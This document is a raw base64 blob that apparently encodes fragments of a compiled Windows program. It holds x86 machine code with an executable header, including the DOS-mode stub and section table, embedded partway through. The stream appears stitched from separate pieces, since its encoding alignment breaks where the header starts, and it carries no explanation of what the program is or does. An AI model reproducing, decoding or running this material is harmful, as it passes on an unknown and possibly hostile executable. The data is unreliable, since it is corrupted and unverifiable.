R4PoGHQxg+gKdCGD6AQPhXX///85ffgPhc0AAADHRfgBAAAAg8sQ6cQAAACBy4AAAADpuQAAAPbDQA+FqgAAAIPLQOmoAAAAx0XwAQAAAOmWAAAA9sMCD4WNAAAAi0X8g+P+g+D8g8sCDYAAAACJRfzrfTl9+HVyx0X4AQAAAIPLIOtsg+hUdFiD6A50Q0h0L4PoC3QVg+gGD4Xq/v//98MAwAAAdUML2utFOX30dTqBZfz/v///x0X0AQAAAOswOX30dSUJVfzHRfQBAAAA6x/3wwDAAAB1EYHLAIAAAOsPuAAQAACF2HQEM8nrAgvYRkYPtwZmO8cPhdj+//85ffAPhKUAAADrAkZGZoM+IHT4agNWaMThQADo6uj//4PEDIXAD4Vg/v//aiCDxgZY6wJGRmY5BnT5ZoM+PQ+FR/7//0ZGZjkGdPlqBWjM4UAAVujxXgAAg8QMhcB1C4PGCoHLAAAEAOtEagho2OFAAFbo0l4AAIPEDIXAdQuDxhCBywAAAgDrJWoHaOzhQABW6LNeAACDxAyFwA+F6v3//4PGDoHLAAABAOsCRkZmgz4gdPhmOT4Phc79//9ogAEAAP91EI1FDFP/dQhQ6G1dAACDxBSFwA+Fxv3//4tFFP8FOCNBAItN/IlIDItNDIl4BIk4iXgIiXgciUgQX15bycNqEGhY+kAA6C8BAAAz2zP/iX3kagHoBFUAAFmJXfwz9ol14Ds1wDxBAA+NzwAAAKG8LEEAjQSwORh0W4sAi0AMqIN1SKkAgAAAdUGNRv2D+BB3Eo1GEFDo/1MAAFmFwA+EmQAAAKG8LEEA/zSwVug8/P//WVmhvCxBAIsEsPZADIN0DFBW6JP8//9ZWUbrkYv4iX3k62jB5gJqOOhvQAAAWYsNvCxBAIkEDqG8LEEAA8Y5GHRJaKAPAACLAIPAIFDoN14AAFlZhcChvCxBAHUT/zQG6LwcAABZobwsQQCJHAbrG4sEBoPAIFD/FVTgQAChvCxBAIs8Bol95IlfDDv7dBaBZwwAgAAAiV8EiV8IiR+JXxyDTxD/x0X8/v///+gLAAAAi8foVQAAAMOLfeRqAegOUwAAWcPMzMxoADRAAGT/NQAAAACLRCQQiWwkEI1sJBAr4FNWV6EEEEEAMUX8M8VQiWXo/3X4i0X8x0X8/v///4lF+I1F8GSjAAAAAMOLTfBkiQ0AAAAAWV9fXluL5V1Rw8zMzMzMzMzMzMzMi/9Vi+yD7BhTi10MVotzCDM1BBBBAFeLBsZF/wDHRfQBAAAAjXsQg/j+dA2LTgQDzzMMOOiH5P//i04Mi0YIA88zDDjod+T//4tFCPZABGYPhRYBAACLTRCNVeiJU/yLWwyJReiJTeyD+/50X41JAI0EW4tMhhSNRIYQiUXwiwCJRfiFyXQUi9fo8AEAAMZF/wGFwHxAf0eLRfiL2IP4/nXOgH3/AHQkiwaD+P50DYtOBAPPMww46ATk//+LTgyLVggDzzMMOuj04///i0X0X15bi+Vdw8dF9AAAAADryYtNCIE5Y3Nt4HUpgz24LEEAAHQgaLgsQQDoU10AAIPEBIXAdA+LVQhqAVL/FbgsQQCDxAiLTQzokwEAAItFDDlYDHQSaAQQQQBXi9OLyOiWAQAAi0UMi034iUgMiwaD+P50DYtOBAPPMww46HHj//+LTgyLVggDzzMMOuhh4///i0Xwi0gIi9foKQEAALr+////OVMMD4RS////aAQQQQBXi8voQQEAAOkc////U1ZXi1QkEItEJBSLTCQYVVJQUVFoHDZAAGT/NQAAAAChBBBBADPEiUQkCGSJJQAAAACLRCQwi1gIi0wkLDMZi3AMg/7+dDuLVCQ0g/r+dAQ78nYujTR2jVyzEIsLiUgMg3sEAHXMaAEBAACLQwjoJl4AALkBAAAAi0MI6DheAADrsGSPBQAAAACDxBhfXlvDi0wkBPdBBAYAAAC4AQAAAHQzi0QkCItICDPI6ITi//9Vi2gY/3AM/3AQ/3AU6D7///+DxAxdi0QkCItUJBCJArgDAAAAw1WLTCQIiyn/cRz/cRj/cSjoFf///4PEDF3CBABVVldTi+ozwDPbM9Iz9jP//9FbX15dw4vqi/GLwWoB6INdAAAzwDPbM8kz0jP//+ZVi+xTVldqAGoAaMM2QABR6MuZAABfXltdw1WLbCQIUlH/dCQU6LT+//+DxAxdwggAi/9Vi+xWi3UIVuhgXgAAWYP4/3UQ6ITw///HAAkAAACDyP/rTVf/dRBqAP91DFD/FWDgQACL+IP//3UI/xUY4EAA6wIzwIXAdAxQ6HTw//9Zg8j/6xuLxsH4BYsEhaArQQCD5h/B5gaNRDAEgCD9i8dfXl3DahBoePpAAOg8/P//i0UIg/j+dRvoI/D//4MgAOgI8P//xwAJAAAAg8j/6Z0AAAAz/zvHfAg7BYgrQQByIej67///iTjo4O///8cACQAAAFdXV1dX6Gjv//+DxBTryYvIwfkFjRyNoCtBAIvwg+YfweYGiwsPvkwxBIPhAXS/UOjtXQAAWYl9/IsD9kQwBAF0Fv91EP91DP91COjs/v//g8QMiUXk6xbofe///8cACQAAAOiF7///iTiDTeT/x0X8/v///+gJAAAAi0Xk6Lz7///D/3UI6DdeAABZw4v/VYvsi0UIVjP2O8Z1Heg57///VlZWVlbHABYAAADowe7//4PEFIPI/+sDi0AQXl3Di/9Vi+xTVot1CItGDIvIgOEDM9uA+QJ1QKkIAQAAdDmLRghXiz4r+IX/fixXUFbomv///1lQ6BATAACDxAw7x3UPi0YMhMB5D4Pg/YlGDOsHg04MIIPL/1+LRgiDZgQAiQZei8NbXcOL/1WL7FaLdQiF9nUJVug1AAAAWesvVuh8////WYXAdAWDyP/rH/dGDABAAAB0FFboMf///1DoIV8AAFn32FkbwOsCM8BeXcNqFGiY+kAA6H76//8z/4l95Il93GoB6FJOAABZiX38M/aJdeA7NcA8QQAPjYMAAAChvCxBAI0EsDk4dF6LAPZADIN0VlBW6LP1//9ZWTPSQolV/KG8LEEAiwSwi0gM9sGDdC85VQh1EVDoSv///1mD+P90Hv9F5OsZOX0IdRT2wQJ0D1DoL////1mD+P91AwlF3Il9/OgIAAAARuuEM/+LdeChvCxBAP80sFbovPX//1lZw8dF/P7////oEgAAAIN9CAGLReR0A4tF3Oj/+f//w2oB6LtMAABZw2oB6B////9Zw4v/VYvsg+wMU1eLfQgz2zv7dSDocO3//1NTU1NTxwAWAAAA6Pjs//+DxBSDyP/pZgEAAFfoAv7//zlfBFmJRfx9A4lfBGoBU1DoEf3//4PEDDvDiUX4fNOLVwz3wggBAAB1CCtHBOkuAQAAiweLTwhWi/Ar8Yl19PbCA3RBi1X8i3X8wfoFixSVoCtBAIPmH8HmBvZEMgSAdBeL0TvQcxGL8IA6CnUF/0X0M9tCO9Zy8Tld+HUci0X06doAAACE0njv6MHs///HABYAAADphwAAAPZHDAEPhLQAAACLVwQ703UIiV306aUAAACLXfyLdfwrwQPCwfsFg+YfjRydoCtBAIlFCIsDweYG9kQwBIB0eWoCagD/dfzoQvz//4PEDDtF+HUgi0cIi00IA8jrCYA4CnUD/0UIQDvBcvP3RwwAIAAA60BqAP91+P91/OgN/P//g8QMhcB9BYPI/+s6uAACAAA5RQh3EItPDPbBCHQI98EABAAAdAOLRxiJRQiLA/ZEMAQEdAP/RQiLRQgpRfiLRfSLTfgDwV5fW8nDi/9Vi+xWi3UIVzP/O/d1HejW6///V1dXV1fHABYAAADoXuv//4PEFOn3AAAAi0YMqIMPhOwAAACoQA+F5AAAAKgCdAuDyCCJRgzp1QAAAIPIAYlGDKkMAQAAdQlW6B8rAABZ6wWLRgiJBv92GP9NWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADoAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dyYW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAKlV1cDtNLuT7TS7k+00u5PkTD+TyzS7k+RMLpP9NLuT5Ew4k5Y0u5PkTCiT5DS7k+00upOPNLuT5Ewxk+80u5PkTCqT7DS7k1JpY2jtNLuTAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQABzRZTAAAAAAAAAADgAAIBCwEJAADCAAAATAAAAAAAAM4kAAAAEAAAAOAAAAAAQAAAEAAAAAIAAAUAAAAAAAAABQAAAAAAAAAAcAEAAAQAALa4AQACAECBAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAABU/gAAZAAAAABAAQC0AQAAAAAAAAAAAAAAAAAAAAAAAABQAQBkCQAAoOEAABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI+AAAQAAAAAAAAAAAAAAAAOAAAFgBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAJTAAAAAEAAAAMIAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAAGJgAAAOAAAAAoAAAAxgAAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAyCwAAAAQAQAAEAAAAO4AAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAALQBAAAAQAEAAAIAAAD+AAAAAAAAAAAAAAAAAABAAABALnJlbG9jAACCEAAAAFABAAASAAAAAAEAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVYvsgeygCAAAoQQQQQAzxYlF/FNWV2jEAAAAjYU4////agC/LAAAAFCL8Ym9NP///+jKMwAAi1UIagpqYo2NNv///1FS6HsJAABoLPRAAI2FNP///2pkUOiPCQAAaMwHAACNjWj3//9qAFGJvWT3///oijMAAFaNlWT3//9o6AMAAFLoZAkAAIPEQGgs9EAAjYVk9///aOgDAABQ6EsJAACNhTT///+DxAyNUAKNSQBmiwiDwAJmhcl19SvC0fiL2I2FZPf//zP2jVACjWQkAGaLCIPAAmaFyXX1K8LR+HRCjb1k9///U42NNP///1dR6HQJAACDxAyFwHQ6jYVk9///RoPHAo1QAo2kJAAAAABmiwiDwAJmhcl19SvC0fg78HLEX14ywFuLTfwzzeiOBwAAi+Vdw4tN/F9eM82wAVvoewcAAIvlXcPMzMzMzMzMVYvsuOTHAADoI4oAAKEEEEEAM8WJRfxWizUE4EAAV42FbDj//1D/1lD/FUDhQACL+Im9cDj//4X/dSpqEGgM9EAAaDD0QABQ/xVQ4UAAX7geJwAAXotN/DPN6BEHAACL5V3CEACLhWw4//+D+AR9R1BobPRAAI2NxK3//2gQJwAAUejJCAAAg8QQahBoDPRAAI2VxK3//1JqAP8VUOFAAF+4EScAAF6LTfwzzei/BgAAi+VdwhAAU//Wi/BWaKj0QACNhcSt//9oECcAAFDofQgAAIsHUGjc9EAAjY3Erf//aBAnAABRiYVoOP//6F4IAACLVwRS6HMIAACL2IPEJIXbf0hTaOj0QACNhcSt//9oECcAAFDoNQgAAIPEEGoQaAz0QACNjcSt//9RagD/FVDhQABbX7gSJwAAXotN/DPN6CoGAACL5V3CEACLRwhQaCj1QACNlcSt//9oECcAAFKJhYw4///o5AcAAIuFjDj//4PEEFD/FQDgQACD+P90BKgQdQrHhYw4//8AAAAAi38MV2hI9UAAjY3Erf//aBAnAABRib1kOP//6KEHAACLxoPEEDPSjXgCjaQkAAAAAGaLCIPAAmaFyXX1K8fR+HQrZoM8Vip0HYvGQo14Aov/ZosIg8ACZoXJdfUrx9H4O9By3usHjUIBhcB1MlNocPVAAI2VxK3//2gQJwAAUug9BwAAg8QQW1+4HCcAAF6LTfwzzehIBQAAi+VdwhAAjTxGV2i09UAAjYXErf//aBAnAABQ6AgHAACDxBCNjeT7//9RaAUBAAD/FQjgQACFwHUrahBoDPRAAGjs9UAAUP8VUOFAAFtfuBMnAABei038M83o6gQAAIvlXcIQAI2V8P3//1JqAGgc9kAAjYXk+///UP8VDOBAAIXAdStqEGgM9EAAaCT2QABQ/xVQ4UAAW1+4FCcAAF6LTfwzzeigBAAAi+VdwhAAi41oOP//aGD2QABRjZWQOP//UuhcBwAAg8QMhcB0SFBoaPZAAI2FxK3//2gQJwAAUOhEBgAAg8QQahBoDPRAAI2NxK3//1FqAP8VUOFAAFtfuBUnAABei038M83oOQQAAIvlXcIQAGjA9kAAjZXw/f//Uo2FhDj//1Do9QYAAIPEDIXAdEhQaMj2QACNjcSt//9oECcAAFHo3QUAAIPEEGoQaAz0QACNlcSt//9SagD/FVDhQABbX7gVJwAAXotN/DPN6NIDAACL5V3CEACLhZA4//9qAvfbU1DocgcAAIPEDIXAfSxqEGgM9EAAaCD3QABqAP8VUOFAAFtfuBcnAABei038M83ojgMAAIvlXcIQAIuNkDj//1HouAcAAIPEBIXAdWzrA41JAIuVkDj//1JoECcAAI2FlDj//2oBUOiaCgAAi42QOP//UYvw6LgHAACDxBSFwA+FqwEAAIuVhDj//1JWjYWUOP//agFQ6OoLAACDxBA78A+FtgEAAIuNkDj//1HoTAcAAIPEBIXAdJmLlZA4//9S6LkMAACLhYQ4//9Q6K0MAAAzwGpEUI2NHDj//1GJhXQ4//+JhXg4//+JhXw4//+JhYA4///oCC4AAIPEFGoAx4UcOP//RAAAAP8VEOBAADPSaB5OAABSjYWmX///UGaJlaRf///o2C0AAGjc90AAjY2kX///aBAnAABR6K4DAACNlfD9//9SjYWkX///aBAnAABQ6JYDAABo4PdAAI2NpF///2gQJwAAUeiAAwAAV42VpF///2gQJwAAUuhuAwAAjYWkX///UGjo90AAjY3Erf//aBAnAABR6AUEAACLjYw4//+DxEyNlXQ4//9SjYUcOP//UFFqAGoAagBqAGoAjZWkX///UmoA/xUU4EAAhcAPhbIAAACLNRjgQAD/1lD/1lCNhaRf//9QaAD4QACNjcSt//9oECcAAFHoowMAAIPEGGoQaAz0QACNlcSt//9SagD/FVDhQABbX7gbJwAAXotN/DPN6JgBAACL5V3CEABqEGgM9EAAaGz3QABqAP8VUOFAAFtfuBgnAABei038M83obAEAAIvlXcIQAGoQaAz0QABooPdAAGoA/xVQ4UAAW1+4GScAAF6LTfwzzehAAQAAi+VdwhAAi4V0OP//av9Q/xUc4EAAi5V0OP//jY2IOP//UVLHhYg4//8AAAAA/xUg4EAAhcB1K2oQaAz0QABoUPhAAFD/FVDhQABbX7gdJwAAXotN/DPN6OQAAACL5V3CEACLhXQ4//+LNSTgQABQ/9aLjXg4//9R/9aLHUjhQACLPSjgQAAz9usGjZsAAAAAjZXw/f//UujcCgAAg8QEjYXw/f//UP/ThcB0DWjoAwAA/9dGg/54fNeNjfD9//9R/9OFwHQsahBoDPRAAGiI+EAAagD/FVDhQABbX7gaJwAAXotN/DPN6FQAAACL5V3CEACLlYg4//+LjWQ4//9S6Hz3//+DxASEwHURi7WIOP//hfZ1Cb4fJwAA6wIz9ouFcDj//1D/FSzgQACLTfxbX4vGM81e6AYAAACL5V3CEAA7DQQQQQB1AvPD6QkMAACL/1WL7FFTVovwM9s783Ue6JkOAABqFl5TU1NTU4kw6CIOAACDxBSLxunCAAAAVzldDHce6HUOAABqFl5TU1NTU4kw6P4NAACDxBSLxumdAAAAM8A5XRRmiQYPlcBAOUUMdwnoRg4AAGoi68+LRRCDwP6D+CJ3vYld/IvOOV0UdBP3XQhqLVhmiQaNTgLHRfwBAAAAi/mLRQgz0vd1EIlFCIP6CXYFg8JX6wODwjCLRfxmiRFBQUAz24lF/DldCHYFO0UMctA7RQxyBzPAZokG65EzwGaJAUlJZosXD7cBZokRSWaJB0lHRzv5cuwzwF9eW8nCEACL/1WL7DPAg30UCnUGOUUIfQFAUP91FItFDP91EP91COjl/v//XcOL/1WL7ItVCFNWVzP/O9d0B4tdDDvfdx7odA0AAGoWXokwV1dXV1fo/QwAAIPEFIvGX15bXcOLdRA793UHM8BmiQLr1IvKZjk5dAVBQUt19jvfdOkPtwZmiQFBQUZGZjvHdANLde4zwDvfdcVmiQLoHQ0AAGoiWYkIi/HrpYv/VYvsg30QAHUEM8Bdw4tVDItNCP9NEHQTD7cBZoXAdAtmOwJ1BkFBQkLr6A+3AQ+3CivBXcOL/1WL7I1FFFBqAP91EP91DP91COiPEAAAg8QUXcOL/1WL7GoKagD/dQjo/hIAAIPEDF3DagxokPlAAOi8GAAAM/aJdeQzwItdCDveD5XAO8Z1HOiFDAAAxwAWAAAAVlZWVlboDQwAAIPEFDPA63szwIt9DDv+D5XAO8Z01jPAZjk3D5XAO8Z0yugzFwAAiUUIO8Z1DehDDAAAxwAYAAAA68mJdfxmOTN1IOguDAAAxwAWAAAAav6NRfBQaAQQQQDoJxoAAIPEDOuhUP91EFdT6DgUAACDxBCJReTHRfz+////6AkAAACLReToUhgAAMP/dQjoqhMAAFnDi/9Vi+xWV4t9CDP2O/51G+jOCwAAahZfVlZWVlaJOOhXCwAAg8QUi8frJGiAAAAA/3UQ/3UM6P/+//+DxAyJBzvGdAQzwOsH6JYLAACLAF9eXcOL/1WL7FaLdQiLRgyog3UQ6HsLAADHABYAAACDyP/rZ4Pg74N9EAGJRgx1Dlbo1h0AAAFFDINlEABZVug1HAAAi0YMWYTAeQiD4PyJRgzrFqgBdBKoCHQOqQAEAAB1B8dGGAACAAD/dRD/dQxW6NEbAABZUOjuGgAAM8mDxAyD+P8PlcFJi8FeXcNqDGiw+UAA6BkXAAAzwDP2OXUID5XAO8Z1HejnCgAAxwAWAAAAVlZWVlbobwoAAIPEFIPI/+s+i30QO/50CoP/AXQFg/8CddL/dQjoCBIAAFmJdfxX/3UM/3UI6Bb///+DxAyJReTHRfz+////6AkAAACLReTo8BYAAMP/dQjoSBIAAFnDi/9Vi+yLRQhWM/Y7xnUc6G0KAABWVlZWVscAFgAAAOj1CQAAg8QUM8DrBotADIPgEF5dw4v/VYvsi0UIVjP2O8Z1HOg5CgAAVlZWVlbHABYAAADowQkAAIPEFDPA6waLQAyD4CBeXcOL/1WL7IPsEItNCFOLXQxWVzP/iU34iV38OX0QdCE5fRR0HDvPdR/o7QkAAFdXV1fHABYAAABX6HUJAACDxBQzwF9eW8nDi3UYO/d0DYPI/zPS93UQOUUUdiGD+/90C1NXUeg1JgAAg8QMO/d0uYPI/zPS93UQOUUUd6yLfRAPr30U90YMDAEAAIl98IvfdAiLRhiJRfTrB8dF9AAQAACF/w+E6gAAAPdGDAwBAAB0RItGBIXAdD0PjDUBAACL+zvYcgKL+Dt9/A+HywAAAFf/Nv91/P91+Og8JQAAKX4EAT4Bffgr34PEECl9/It98OmVAAAAO130cmiDffQAdB+5////fzPSO9l2CYvB93X0i8HrB4vD93X0i8MrwusLuP///3872HcCi8M7RfwPh5MAAABQ/3X4VuiQGQAAWVDo2CMAAIPEDIXAD4S2AAAAg/j/D4SbAAAAAUX4K9gpRfzrKFboxxwAAFmD+P8PhIUAAACDffwAdE6LTfj/RfiIAYtGGEv/TfyJRfSF2w+FFv///4tFFOmo/v//M/aDfQz/dA//dQxW/3UI6O8kAACDxAzoZAgAAFZWVlbHACIAAABW6XL+//+DfQz/dBD/dQxqAP91COjEJAAAg8QM6DkIAADHACIAAAAzwFBQUFBQ6UX+//+DTgwgi8crwzPS93UQ6T3+//+DTgwQ6+xqDGjQ+UAA6CIUAAAz9ol15Dl1EHQ3OXUUdDI5dRh1NYN9DP90D/91DFb/dQjoYCQAAIPEDOjVBwAAxwAWAAAAVlZWVlboXQcAAIPEFDPA6B8UAADD/3UY6AQPAABZiXX8/3UY/3UU/3UQ/3UM/3UI6IH9//+DxBSJReTHRfz+////6AUAAACLReTrw/91GOhADwAAWcOL/1WL7P91FP91EP91DGr//3UI6FL///+DxBRdw4v/VYvsg+wMU1ZXM/85fQx0JDl9EHQfi3UUO/d1H+g5BwAAV1dXV1fHABYAAADowQYAAIPEFDPAX15bycOLTQg7z3Tag8j/M9L3dQw5RRB3zYt9DA+vfRD3RgwMAQAAiU38iX30i990CItGGIlF+OsHx0X4ABAAAIX/D4S/AAAAi04MgeEIAQAAdC+LRgSFwHQoD4yvAAAAi/s72HICi/hX/3X8/zboxCsAACl+BAE+g8QMK98BffzrTztd+HJPhcl0C1boeBcAAFmFwHV9g334AIv7dAkz0ovD93X4K/pX/3X8VugmFwAAWVDonCoAAIPEDIP4/3Rhi887x3cCi8gBTfwr2TvHclCLffTrKYtF/A++AFZQ6CkHAABZWYP4/3Qp/0X8i0YYS4lF+IXAfwfHRfgBAAAAhdsPhUH///+LRRDp8f7//4NODCCLxyvDM9L3dQzp3/7//4NODCCLRfTr62oMaPD5QADoDRIAADP2OXUMdCk5dRB0JDPAOXUUD5XAO8Z1IOjRBQAAxwAWAAAAVlZWVlboWQUAAIPEFDPA6BsSAADD/3UU6AANAABZiXX8/3UU/3UQ/3UM/3UI6D3+//+DxBCJReTHRfz+////6AUAAACLReTrxv91FOg/DQAAWcOL/1WL7FNWi3UIVzP/g8v/O/d1HOhfBQAAV1dXV1fHABYAAADo5wQAAIPEFAvD60L2RgyDdDdW6CEWAABWi9jooy8AAFbo4RUAAFDoyi4AAIPEEIXAfQWDy//rEYtGHDvHdApQ6IctAABZiX4ciX4Mi8NfXltdw2oMaBD6QADoFBEAAINN5P8zwIt1CDP/O/cPlcA7x3Ud6NwEAADHABYAAABXV1dXV+hkBAAAg8QUg8j/6wz2RgxAdAyJfgyLReToFxEAAMNW6P4LAABZiX38Vugq////WYlF5MdF/P7////oBQAAAOvVi3UIVuhMDAAAWcOL/1WL7P91CP8VOOBAAIXAdQj/FRjgQADrAjPAhcB0DFDohQQAAFmDyP9dwzPAXcOL/1WL7IM9CCBBAAF1BegVNAAA/3UI6GIyAABo/wAAAOikLwAAWVldw2pYaDD6QADoPxAAADP2iXX8jUWYUP8VPOBAAGr+X4l9/LhNWgAAZjkFAABAAHU4oTwAQACBuAAAQABQRQAAdSe5CwEAAGY5iBgAQAB1GYO4dABAAA52EDPJObDoAEAAD5XBiU3k6wOJdeQz20NT6ONAAABZhcB1CGoc6Fj///9Z6EQ/AACFwHUIahDoR////1no1zoAAIld/Oh7OAAAhcB9CGob6KMuAABZ6GQ4AACjxDxBAOgDOAAAowQgQQDoSzcAAIXAfQhqCOh+LgAAWegLNQAAhcB9CGoJ6G0uAABZU+glLwAAWTvGdAdQ6FsuAABZ6KI0AACEXcR0Bg+3TcjrA2oKWVFQVmgAAEAA6O3s//+JReA5deR1BlDonDAAAOjDMAAAiX386zWLReyLCIsJiU3cUFHo/jIAAFlZw4tl6ItF3IlF4IN95AB1BlDofzAAAOifMAAAx0X8/v///4tF4OsTM8BAw4tl6MdF/P7///+4/wAAAOgUDwAAw+gEQAAA6Xn+//+L/1WL7IHsKAMAAKMYIUEAiQ0UIUEAiRUQIUEAiR0MIUEAiTUIIUEAiT0EIUEAZowVMCFBAGaMDSQhQQBmjB0AIUEAZowF/CBBAGaMJfggQQBmjC30IEEAnI8FKCFBAItFAKMcIUEAi0UEoyAhQQCNRQijLCFBAIuF4Pz//8cFaCBBAAEAAQChICFBAKMcIEEAxwUQIEEACQQAwMcFFCBBAAEAAAChBBBBAImF2Pz//6EIEEEAiYXc/P///xVQ4EAAo2AgQQBqAejIPwAAWWoA/xVM4EAAaLzhQAD/FUjgQACDPWAgQQAAdQhqAeikPwAAWWgJBADA/xVE4EAAUP8VQOBAAMnDi/9Vi+yLRQijNCNBAF3Di/9Vi+yB7CgDAAChBBBBADPFiUX8g6XY/P//AFNqTI2F3Pz//2oAUOjmHQAAjYXY/P//iYUo/f//jYUw/f//g8QMiYUs/f//iYXg/f//iY3c/f//iZXY/f//iZ3U/f//ibXQ/f//ib3M/f//ZoyV+P3//2aMjez9//9mjJ3I/f//ZoyFxP3//2aMpcD9//9mjK28/f//nI+F8P3//4tFBI1NBMeFMP3//wEAAQCJhej9//+JjfT9//+LSfyJjeT9///Hhdj8//8XBADAx4Xc/P//AQAAAImF5Pz///8VUOBAAGoAi9j/FUzgQACNhSj9//9Q/xVI4EAAhcB1DIXbdQhqAuh4PgAAWWgXBADA/xVE4EAAUP8VQOBAAItN/DPNW+it8f//ycOL/1WL7P81NCNBAOhgOAAAWYXAdANd/+BqAug5PgAAWV3psv7//4v/VYvsi0UIM8k7BM0QEEEAdBNBg/ktcvGNSO2D+RF3DmoNWF3DiwTNFBBBAF3DBUT///9qDlk7yBvAI8GDwAhdw+jWOQAAhcB1Brh4EUEAw4PACMPowzkAAIXAdQa4fBFBAMODwAzDi/9Vi+xW6OL///+LTQhRiQjogv///1mL8Oi8////iTBeXcPMzMzMzMzMzMzMVotEJBQLwHUoi0wkEItEJAwz0vfxi9iLRCQI9/GL8IvD92QkEIvIi8b3ZCQQA9HrR4vIi1wkEItUJAyLRCQI0enR29Hq0dgLyXX09/OL8PdkJBSLyItEJBD35gPRcg47VCQMdwhyDztEJAh2CU4rRCQQG1QkFDPbK0QkCBtUJAz32vfYg9oAi8qL04vZi8iLxl7CEACL/1WL7FFWi3UMVui7DwAAiUUMi0YMWaiCdRfo+P7//8cACQAAAINODCCDyP/pLwEAAKhAdA3o3f7//8cAIgAAAOvjUzPbqAF0FoleBKgQD4SHAAAAi04Ig+D+iQ6JRgyLRgyD4O+DyAKJRgyJXgSJXfypDAEAAHUs6BUFAACDwCA78HQM6AkFAACDwEA78HUN/3UM6F4+AABZhcB1B1boCj4AAFn3RgwIAQAAVw+EgAAAAItGCIs+jUgBiQ6LThgr+Ek7+4lOBH4dV1D/dQzodCIAAIPEDIlF/OtNg8ggiUYMg8j/63mLTQyD+f90G4P5/nQWi8GD4B+L0cH6BcHgBgMElaArQQDrBbjQFUEA9kAEIHQUagJTU1HodjwAACPCg8QQg/j/dCWLRgiKTQiICOsWM/9HV41FCFD/dQzoBSIAAIPEDIlF/Dl9/HQJg04MIIPI/+sIi0UIJf8AAABfW17Jw4v/VYvsi0UIVovxxkYMAIXAdWPo8DcAAIlGCItIbIkOi0hoiU4Eiw47DSgcQQB0EosNRBtBAIVIcHUH6ElHAACJBotGBDsFSBpBAHQWi0YIiw1EG0EAhUhwdQjovT8AAIlGBItGCPZAcAJ1FINIcALGRgwB6wqLCIkOi0AEiUYEi8ZeXcIEAIv/VYvsg+wgUzPbOV0UdSDoGP3//1NTU1NTxwAWAAAA6KD8//+DxBSDyP/pxQAAAFaLdQxXi30QO/t0JDvzdSDo6Pz//1NTU1NTxwAWAAAA6HD8//+DxBSDyP/pkwAAAMdF7EIAAACJdeiJdeCB/////z92CcdF5P///3/rBo0EP4lF5P91HI1F4P91GP91FFD/VQiDxBCJRRQ783RVO8N8Qv9N5HgKi0XgiBj/ReDrEY1F4FBT6Fr9//9ZWYP4/3Qi/03keAeLReCIGOsRjUXgUFPoPf3//1lZg/j/dAWLRRTrDzPAOV3kZolEfv4PncBISF9eW8nDi/9Vi+xWM/Y5dRB1Hegj/P//VlZWVlbHABYAAADoq/v//4PEFIPI/+teV4t9CDv+dAU5dQx3Dej5+///xwAWAAAA6zP/dRj/dRT/dRD/dQxXaB93QADorf7//4PEGDvGfQUzyWaJD4P4/nUb6MT7///HACIAAABWVlZWVuhM+///g8QUg8j/X15dw4v/VYvsg+wYU1f/dQiNTejo4f3//4tFEIt9DDPbO8N0Aok4O/t1K+h++///U1NTU1PHABYAAADoBvv//4PEFDhd9HQHi0Xwg2Bw/TPA6aQBAAA5XRR0DIN9FAJ8yoN9FCR/xFYPtzeJXfyDxwLrBQ+3N0dHjUXoUGoIVuhHWAAAg8QMhcB16GaD/i11BoNNGALrBmaD/it1BQ+3N0dHOV0UdTNW6ENWAABZhcB0CcdFFAoAAADrRg+3B2aD+Hh0D2aD+Fh0CcdFFAgAAADrLsdFFBAAAACDfRQQdSFW6ApWAABZhcB1Fg+3B2aD+Hh0BmaD+Fh1B0dHD7c3R0eDyP8z0vd1FIlV+IvYVujcVQAAWYP4/3UpakFYZjvGdwZmg/5adgmNRp9mg/gZdzGNRp9mg/gZD7fGdwOD6CCDwMk7RRRzGoNNGAg5XfxyKXUFO0X4diKDTRgEg30QAHUki0UYT0+oCHUig30QAHQDi30Mg2X8AOtdi038D69NFAPIiU38D7c3R0frgb7///9/qAR1G6gBdT2D4AJ0CYF9/AAAAIB3CYXAdSs5dfx2Juj4+f//9kUYAccAIgAAAHQGg038/+sP9kUYAmoAWA+VwAPGiUX8i0UQXoXAdAKJOPZFGAJ0A/dd/IB99AB0B4tF8INgcP2LRfxfW8nDi/9Vi+wzwFD/dRD/dQz/dQg5BcQoQQB1B2gwHEEA6wFQ6OD9//+DxBRdw7iAEUEAw6HAPEEAVmoUXoXAdQe4AAIAAOsGO8Z9B4vGo8A8QQBqBFDokEUAAFlZo7wsQQCFwHUeagRWiTXAPEEA6HdFAABZWaO8LEEAhcB1BWoaWF7DM9K5gBFBAOsFobwsQQCJDAKDwSCDwgSB+QAUQQB86mr+XjPSuZARQQBXi8LB+AWLBIWgK0EAi/qD5x/B5waLBAeD+P90CDvGdASFwHUCiTGDwSBCgfnwEUEAfM5fM8Bew+g4CwAAgD1kI0EAAHQF6KJWAAD/NbwsQQDoKCEAAFnDi/9Vi+xWi3UIuIARQQA78HIigf7gE0EAdxqLzivIwfkFg8EQUeiGWAAAgU4MAIAAAFnrCoPGIFb/FVTgQABeXcOL/1WL7ItFCIP4FH0Wg8